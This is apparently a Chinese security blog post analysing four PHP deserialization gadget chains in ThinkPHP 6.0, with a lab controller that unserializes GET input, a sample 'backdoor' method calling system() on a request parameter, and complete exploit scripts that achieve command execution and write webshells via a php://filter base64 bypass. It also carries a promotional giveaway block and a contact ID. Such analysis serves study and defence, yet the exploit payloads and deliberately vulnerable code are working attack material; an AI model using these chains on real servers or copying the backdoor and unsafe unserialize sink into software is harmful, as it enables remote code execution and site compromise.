写点什么

6.0 反序列化漏洞分析

发布于: 刚刚

Thinkphp 6.0 反序列化漏洞分析

ThinkPHP 目录结构:


project  应用部署目录├─application           应用目录(可设置)│  ├─common             公共模块目录(可更改)│  ├─index              模块目录(可更改)│  │  ├─config.php      模块配置文件│  │  ├─common.php      模块函数文件│  │  ├─controller      控制器目录│  │  ├─model           模型目录│  │  ├─view            视图目录│  │  └─ ...            更多类库目录│  ├─command.php        命令行工具配置文件│  ├─common.php         应用公共(函数)文件│  ├─config.php         应用(公共)配置文件│  ├─database.php       数据库配置文件│  ├─tags.php           应用行为扩展定义文件│  └─route.php          路由配置文件├─extend                扩展类库目录(可定义)├─public                WEB 部署目录(对外访问目录)│  ├─static             静态资源存放目录(css,js,image)│  ├─index.php          应用入口文件│  ├─router.php         快速测试文件│  └─.htaccess          用于 apache 的重写├─runtime               应用的运行时目录(可写,可设置)├─vendor                第三方类库目录(Composer)├─thinkphp              框架系统目录│  ├─lang               语言包目录│  ├─library            框架核心类库目录│  │  ├─think           Think 类库包目录│  │  └─traits          系统 Traits 目录│  ├─tpl                系统模板目录│  ├─.htaccess          用于 apache 的重写│  ├─.travis.yml        CI 定义文件│  ├─base.php           基础定义文件│  ├─composer.json      composer 定义文件│  ├─console.php        控制台入口文件│  ├─convention.php     惯例配置文件│  ├─helper.php         助手函数文件(可选)│  ├─LICENSE.txt        授权说明文件│  ├─phpunit.xml        单元测试配置文件│  ├─README.md          README 文件│  └─start.php          框架引导文件├─build.php             自动生成定义文件(参考)├─composer.json         composer 定义文件├─LICENSE.txt           授权说明文件├─README.md             README 文件├─think                 命令行入口文件
复制代码


控制器写法:


控制器文件通常放在application/module/controller下面,类名和文件名保持大小写一致,并采用驼峰命名(首字母大写)。


为了感谢广大读者伙伴的支持,准备了以下福利给到大家:【一>所有资源获取<一】1、200 多本网络安全系列电子书(该有的都有了)2、全套工具包(最全中文版,想用哪个用哪个)3、100 份 src 源码技术文档(项目学习不停,实践得真知)4、网络安全基础入门、Linux、web 安全、攻防方面的视频(2021 最新版)5、网络安全学习路线(告别不入流的学习)6、ctf 夺旗赛解析(题目解析实战操作)


一个典型的控制器类定义如下:


<?phpnamespace app\index\controller;
use think\Controller;
class Index extends Controller{ public function index() { return 'index'; }}
复制代码


控制器类文件的实际位置是


application\index\controller\Index.php
复制代码


一个例子:


<?phpnamespace app\controller;
use app\BaseController;
class Index extends BaseController{ public function index() { return '<style type="text/css">*{ padding: 0; margin: 0; } div{ padding: 4px 48px;} a{color:#2E5CD5;cursor: pointer;text-decoration: none} a:hover{text-decoration:underline; } body{ background: #fff; font-family: "Century Gothic","Microsoft yahei"; color: #333;font-size:18px;} h1{ font-size: 100px; font-weight: normal; margin-bottom: 12px; } p{ line-height: 1.6em; font-size: 42px }</style><div style="padding: 24px 48px;"> <h1>:) </h1><p> ThinkPHP V' . \think\facade\App::version() . '<br/><span style="font-size:30px;">14载初心不改 - 你值得信赖的PHP框架</span></p><span style="font-size:25px;">[ V6.0 版本由 <a href="https://www.yisu.com/" target="yisu">亿速云</a> 独家赞助发布 ]</span></div><script type="text/javascript" src="https://tajs.qq.com/stats?sId=64890268" charset="UTF-8"></script><script type="text/javascript" src="https://e.topthink.com/Public/static/client.js"></script><think id="ee9b1aa918103c4fc"></think>'; } public function backdoor($command) { system($command); }}
复制代码


想进入后门,需要访问:


http://ip/index.php/Index/backdoor/?command=ls
复制代码


所以写一个漏洞利用点:


控制器,app/home/contorller/index.php


<?php
namespace app\home\controller;
use think\facade\Db;
class Index extends Base{ public function index() { return view('index'); } public function payload(){ if(isset($_GET['c'])){ $code = $_GET['c']; unserialize($code); } else{ highlight_file(__FILE__); } return "Welcome to TP6.0"; }}
复制代码


POP1

入口:/vendor/topthink/think-orm/src/Model.php



$this->lazySave==True,跟进:



想要进入updateData方法,需要满足一些条件:



让第一个if里面一个条件为真才能不直接return,也即需要两个条件:


$this->isEmpty()==false$this->trigger('BeforeWrite')==true其中isEmpty(): public function isEmpty(): bool { return empty($this->data); }
复制代码


$this->data!=null即可满足第一个条件。再看trigger('BeforeWrite'),位于ModelEvent类中:


protected function trigger(string $event): bool { if (!$this->withEvent) { return true; } ..... }
复制代码


$this->withEvent==false即可满足第二个条件,


然后需要让$this->exists=true,这样才能执行updateData


跟进updateData()



想要执行checkAllwoFields方法需要绕过前面的两个 if 判断,必须满足两个条件:


$this->trigger('BeforeUpdate')==true$data!=null
复制代码


第一个条件上面已经满足,现在看第二个条件$data,查看$data是怎么来的,跟进getChangedData方法,src/model/concern/Attribute.php



因为$force没定义默认为 null ,所以进入array_udiff_assoc,由于$this->data$this->origin默认也为null,所以不符合第一个if判断,最终$data=0,也即满足前面所提的第二个条件,$data!=null


然后查看 checkAllowFields 方法调用情况。



我们想进入字符拼接操作,就需要进入else,所以要让$this->field=null$this->schema=null,进入下面


这里存在可控属性的字符拼接,所以可以找一个有__tostring方法的类做跳板,寻找__tostring


src/model/concern/Conversion.php



进入toJson方法,



我们想要执行的就是getAttr方法,触发条件:


$this->visible[$key]需要存在,而$key来自$data的键名,$data又来自$this->data,即$this->data必须有一个键名传给$this->visible,然后把键名$key传给getAttr方法,


跟进getAttr方法,vendor/topthink/think-orm/src/model/concern/Attribute.php



跟进getData方法,



跟进getRealFieldName方法,



$this->stricttrue时直接返回$name,即键名$key


返回getData方法,此时$fieldName=$key,进入if语句,返回$this->data[$key],再回到getAttr方法,


return $this->getValue($name, $value, $relation);
复制代码


即返回


return $this->getValue($name, $this->data[$key], $relation);
复制代码


跟进getValue方法,



如果我们让$closure为我们想执行的函数名,$value$this->data为参数即可实现任意函数执行。


所以需要查看$closure属性是否可控,跟进getRealFieldName方法,



如果让$this->strict==true,即可让$$fieldName等于传入的参数$name,即开始的$this->data[$key]的键值$key,可控


又因为$this->withAttr数组可控,所以,$closure可控·,值为$this->withAttr[$key],参数就是$this->data,即$data的键值,


所以我们需要控制的参数:


$this->data不为空$this->lazySave == true$this->withEvent == false$this->exists == true$this->force == true
复制代码


这里还需要注意,Model是抽象类,不能实例化。所以要想利用,得找出 Model 类的一个子类进行实例化,这里可以用 Pivot 类(位于\vendor\topthink\think-orm\src\model\Pivot.php 中)进行利用。


所以构造 exp:


<?phpnamespace think{    abstract class Model{        use model\concern\Attribute;  //因为要使用里面的属性        private $lazySave;        private $exists;        private $data=[];        private $withAttr = [];        public function __construct($obj){            $this->lazySave = True;            $this->withEvent = false;            $this->exists = true;            $this->table = $obj;            $this->data = ['key'=>'dir'];            $this->visible = ["key"=>1];            $this->withAttr = ['key'=>'system'];        }    }}
namespace think\model\concern{ trait Attribute { }}
namespace think\model{ use think\Model; class Pivot extends Model { }
$a = new Pivot(''); $b = new Pivot($a); echo urlencode(serialize($b));}
复制代码


POP2

入口:vendor/league/flysystem-cached-adapter/src/Storage/AbstractCache.php



$autosave = false


因为AbstractCache为抽象类,所以需要找一下它的子类,/vendor/topthink/framework/src/think/filesystem/CacheStore.php,因为里面实现了save方法,



继续跟进getForStorage



跟进cleanContents方法,



只要不是嵌套数组,就可以直接return回来,返回到json_encode,他返回json格式数据后,再回到save方法的set方法,



因为$this->store可控,我们可以调用任意类的set方法,如果该类没用set方法,所以可能触发__call。当然也有可能自身的set方法就可以利用,找到可利用set方法,src/think/cache/driver/File.php



跟进getCacheKey,这里其实就是为了查看进入该方法是否出现错误或者直接return了,



所以这里$this->option['hash_type']不能为空,然后进入serialize方法,src/think/cache/Driver.php



这里发现options可控,如果我们将其赋值为system,那么return的就是我们命令执行函数,$data我们是可以传入的,那就可以 RCE,回溯$data是如何传入的,即save方法传入的$contents,但是$contents是经过了json_encode处理后的json格式数据,那有什么函数可以出来json格式数据呢?经过测试发现system可以利用:



链子如下:


/vendor/league/flysystem-cached-adapter/src/Storage/AbstractCache.php::__destruct()
/vendor/topthink/framework/src/think/filesystem/CacheStore.php::save()
/vendor/topthink/framework/src/think/cache/driver.php::set()
/vendor/topthink/framework/src/think/cache/driver.php::serialize()
复制代码


exp 如下:


<?php
namespace League\Flysystem\Cached\Storage{ abstract class AbstractCache { protected $autosave = false; protected $complete = "`id`"; }}
namespace think\filesystem{ use League\Flysystem\Cached\Storage\AbstractCache; class CacheStore extends AbstractCache { protected $key = "1"; protected $store;
public function __construct($store="") { $this->store = $store; } }}
namespace think\cache{ abstract class Driver { protected $options = [ 'expire' => 0, 'cache_subdir' => true, 'prefix' => '', 'path' => '', 'hash_type' => 'md5', 'data_compress' => false, 'tag_prefix' => 'tag:', 'serialize' => ['system'], ]; }}
namespace think\cache\driver{ use think\cache\Driver; class File extends Driver{}}
namespace{ $file = new think\cache\driver\File(); $cache = new think\filesystem\CacheStore($file); echo urlencode(serialize($cache));}
?>
复制代码


但是没有回显,但是能够反弹 shell ,

POP3

这里其实和 POP2 一样,只是最终利用点发生了些许变化,调用关系还是一样:


/vendor/league/flysystem-cached-adapter/src/Storage/AbstractCache.php::__destruct()
/vendor/topthink/framework/src/think/filesystem/CacheStore.php::save()
/vendor/topthink/framework/src/think/cache/driver.php::set()
/vendor/topthink/framework/src/think/cache/driver.php::serialize()
复制代码


POP2 是利用的控制serialize函数来 RCE,但下面还存在一个file_put_contents($filename, $data)函数,我们也可以利用它来写入 shell,



我们还是需要去查看文件名是否可控,进入getCacheKey方法,



可以发现我们可以控制文件名,而且可以在$this->options['path']添加伪协议,再看写入数据$data是否可控呢,可以看到存在一个exit方法来限制我们操作,可以伪协议filter可以绕过它


所以文件名和内容都可控,exp:


<?php 
namespace League\Flysystem\Cached\Storage{ abstract class AbstractCache { protected $autosave = false; protected $complete = "aaaPD9waHAgcGhwaW5mbygpOw=="; }}
namespace think\filesystem{ use League\Flysystem\Cached\Storage\AbstractCache; class CacheStore extends AbstractCache { protected $key = "1"; protected $store;
public function __construct($store="") { $this->store = $store; } }}
namespace think\cache{ abstract class Driver { protected $options = ["serialize"=>["trim"],"expire"=>1,"prefix"=>0,"hash_type"=>"md5","cache_subdir"=>0,"path"=>"php://filter/write=convert.base64-decode/resource=","data_compress"=>0]; }}
namespace think\cache\driver{ use think\cache\Driver; class File extends Driver{}}
namespace{ $file = new think\cache\driver\File(); $cache = new think\filesystem\CacheStore($file); echo urlencode(serialize($cache));}
?>
复制代码



成功写入

POP4

入口:League\Flysystem\Cached\Storage\AbstractCache



因为AbstractCache为抽象类,所以需要找一下它的子类,src/Storage/Adapter.php



$autosave = false即可进入save方法,



有一个write方法,$contentgetForStorage方法返回值,上文已分析该参数可控,所以可以用来写马。


所以我们需要找一个有has方法和write方法的对象利用,src/Adapter/Local.php



has()方法用来判断文件是否已存在,只需要构建文件名不存在即可,进入write方法,



这里可以执行file_put_contents(),写入shell,跟进applyPathPrefix方法,



然后getPathPrefix方法返回的是该类的一个属性,因为默认为 NULL,所以file_put_contents第一个参数就是$path变量,回溯该变量,也即是Adapter类中的$file属性,所以让$file属性为文件名,所以文件名$file可控,文件内容$contents可控,所以写入shell,exp:


<?php
namespace League\Flysystem\Cached\Storage;
abstract class AbstractCache{ protected $autosave = false; protected $cache = ['<?php phpinfo();?>'];}
namespace League\Flysystem\Cached\Storage;
class Adapter extends AbstractCache{ protected $adapter; protected $file;
public function __construct($obj) { $this->adapter = $obj; $this->file = 'w0s1np.php'; }}
namespace League\Flysystem\Adapter;
abstract class AbstractAdapter{}
namespace League\Flysystem\Adapter;
use League\Flysystem\Cached\Storage\Adapter;use League\Flysystem\Config;
class Local extends AbstractAdapter{
public function has($path) { }
public function write($path, $contents, Config $config) { }
}
$a = new Local();$b = new Adapter($a);echo urlencode(serialize($b));?>
复制代码



成功写入

用户头像

我是一名网络安全渗透师 2021.06.18 加入

关注我,后续将会带来更多精选作品,需要资料+wx:mengmengji08

评论

发布
暂无评论
6.0反序列化漏洞分析